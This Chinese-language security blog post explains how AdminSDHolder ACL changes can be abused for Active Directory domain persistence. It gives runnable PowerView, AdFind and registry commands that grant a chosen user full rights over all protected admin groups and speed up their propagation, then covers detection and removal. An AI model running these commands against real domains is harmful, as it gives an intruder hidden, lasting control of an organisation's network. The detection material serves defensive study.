域渗透——AdminSDHolder

0x00 前言

AdminSDHolder是一个特殊的AD容器，具有一些默认安全权限，用作受保护的AD账户和组的模板。

Active Directory将采用AdminSDHolder对象的ACL并定期将其应用于所有受保护的AD账户和组，以防止意外和无意的修改并确保对这些对象的访问是安全的。

如果能够修改AdminSDHolder对象的ACL，那么修改的权限将自动应用于所有受保护的AD账户和组，这可以作为一个域环境权限维持的方法。

本将要参考公开资料，结合自己的理解，介绍利用方法，补全清除ACL的方法，分析检测方法。

0x01 简介

本文将要介绍以下内容：

·利用思路

·如何枚举受保护的AD账户和组中的信息

·如何查询AdminSDHolder对象的ACL

·如何向AdminSDHolder对象添加ACL

·删除AdminSDHolder中指定用户的ACL

·完整利用方法

·检测建议

0x02 利用思路

1.枚举受保护的AD账户和组中的信息

通常为域内高权限用户，在我的Server2008R2下包含以下组：

·Administrators

·Print Operators

·Backup Operators

·Replicator

·Domain Controllers

·Schema Admins

·Enterprise Admins

·Domain Admins

·Server Operators

·Account Operators

·Read-only Domain Controllers

·Organization Management

·Exchange Trusted Subsystem

2.向AdminSDHolder对象添加ACL

例如，添加用户testa对AdminSDHolder的完全管理权限，默认60分钟以后会自动推送权限配置信息，testa随即获得对所有受保护帐户和组的完全管理权限。

3.获得对整个域的控制权限

此时用户testa能够向域管理员组添加帐户，也能够直接访问域控制器上的文件。

0x03 枚举受保护的AD账户和组中的信息

关于AdminSDHolder，可以参考的资料：

https://docs.microsoft.com/en-us/previous-versions/technet-magazine/ee361593(v=msdn.10)#id0250006

受保护的AD账户和组的特征如下：

AdminCount属性为1。

但是，如果对象已移出受保护组，其AdminCount属性仍为1，也就是说，有可能获得曾经是受保护组的帐户和组。

1.枚举受保护AD账户的方法

(1)PowerView

下载地址：

https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1

命令如下：

Get-NetUser -AdminCount

只筛选出用户名的命令如下：

Get-NetUser -AdminCount |select samaccountname

(2)Adfind

下载地址：

http://www.joeware.net/freetools/tools/adfind/index.htm

命令如下：

Adfind.exe -f "&(objectcategory=person)(samaccountname=*)(admincount=1)" -dn

(3)ActiveDirectory模块

Powershell模块，需要安装，域控制器一般会安装。

命令如下：

Import-Module ActiveDirectory

Get-ADObject -LDAPFilter “(&(admincount=1)(|(objectcategory=person)

(objectcategory=group)))” |select name

注：该命令会列出受保护的AD账户和组。

2.枚举受保护AD组的方法

(1)PowerView

命令如下：

Get-NetGroup -AdminCount

(2)Adfind

命令如下：

Adfind.exe -f "&(objectcategory=group)(admincount=1)" -dn

(3)ActiveDirectory模块

Powershell模块，需要安装，域控制器一般会安装。

命令如下：

Import-Module ActiveDirectory

Get-ADObject -LDAPFilter “(&(admincount=1)(|(objectcategory=person)

(objectcategory=group)))” |select name

对于未安装Active Directory模块的系统，可以通过如下命令导入Active Directory模块：

import-module .\Microsoft.ActiveDirectory.Management.dll

Microsoft.ActiveDirectory.Management.dll在安装powershell模块Active Directory后生成，我已经提取出来并上传至github：

https://github.com/3gstudent/test/blob/master/Microsoft.ActiveDirectory.Management.dll

注：该命令会列出受保护的AD账户和组。

0x04 操作AdminSDHolder对象的ACL

1.查询AdminSDHolder对象的ACL

使用PowerView，地址如下：

https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1

注：该版本不支持Remove-DomainObjectAcl命令。

查询AdminSDHolder对象的ACL等价于查询"CN=AdminSDHolder,CN=System,DC=test,DC=com"的ACL。

命令如下：

Import-Module .\PowerView.ps1

Get-ObjectAcl -ADSprefix "CN=AdminSDHolder,CN=System" |select IdentityReference

2.向AdminSDHolder对象添加ACL

使用PowerView，地址如下：

https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1

添加用户testa的完全访问权限，命令如下：

Import-Module .\PowerView.ps1

Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -

PrincipalSamAccountName testa -Verbose -Rights All

默认等待60分钟以后，testa获得对所有受保护的AD账户和组的完全访问权限。

3.删除AdminSDHolder中指定用户的ACL

使用PowerView，地址如下：

https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

注：该版本支持Remove-DomainObjectAcl命令，但不支持参数TargetADSprefix，所以这里使用TargetSearchBase参数代替。

搜索条件为"LDAP://CN=AdminSDHolder,CN=System,DC=test,DC=com"

删除用户testa的完全访问权限，命令如下：

Remove-DomainObjectAcl -TargetSearchBase "LDAP://CN=AdminSDHolder,CN=System,DC=test,DC=com" -PrincipalIdentity testa -Rights All -Verbose

0x05 完整利用思路

1.枚举受保护的AD账户和组中的信息

查找有价值的用户，需要确认该用户是否属于受保护的AD账户和组，排除曾经属于受保护的AD账户和组。

2.向AdminSDHolder对象添加ACL

例如添加用户testa对AdminSDHolder的完全访问权限。

默认等待60分钟以后，testa获得对所有受保护的AD账户和组的完全访问权限。

可以通过修改注册表的方式设置权限推送的间隔时间，注册表位置如下：

·HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters,AdminSDProtectFrequency,REG_DWORD

例如修改成等待600秒的命令如下：

reg add hklm\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /v AdminSDProtectFrequency /t REG_DWORD /d 600

参考资料：

https://blogs.technet.microsoft.com/askds/2009/05/07/five-common-questions-about-adminsdholder-and-sdprop/

注：不建议降低默认间隔时间，因为在大型环境中可能会导致LSASS性能下降。

3.获得对整个域的控制权限

(1)用户testa能够向域管理员组添加帐户。

验证权限的命令如下：

Import-Module .\PowerView.ps1

Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'testa'}

(2)用户testa能够直接访问域控制器上的文件。

0x06 检测和清除

1.检测AdminSDHolder的ACL

查看"CN=AdminSDHolder,CN=System,DC=test,DC=com"的ACL，命令如下：

Import-Module .\PowerView.ps1

Get-ObjectAcl -ADSprefix "CN=AdminSDHolder,CN=System" |select IdentityReference

注：

这里使用的PowerView版本：

https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1

查看是否有可疑用户。

2.清除AdminSDHolder中可疑用户的ACL

删除AdminSDHolder中可疑用户testa的ACL。

使用PowerView，地址如下：

https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

删除用户testa的完全访问权限，命令如下：

Remove-DomainObjectAcl -TargetSearchBase "LDAP://CN=AdminSDHolder,CN=System,DC=test,DC=com" -PrincipalIdentity testa -Rights All -Verbose

0x07 小结

本文介绍了AdminSDHolder作为权限维持的利用方法，补充了检测和清除AdminSDHolder中可疑用户ACL的方法。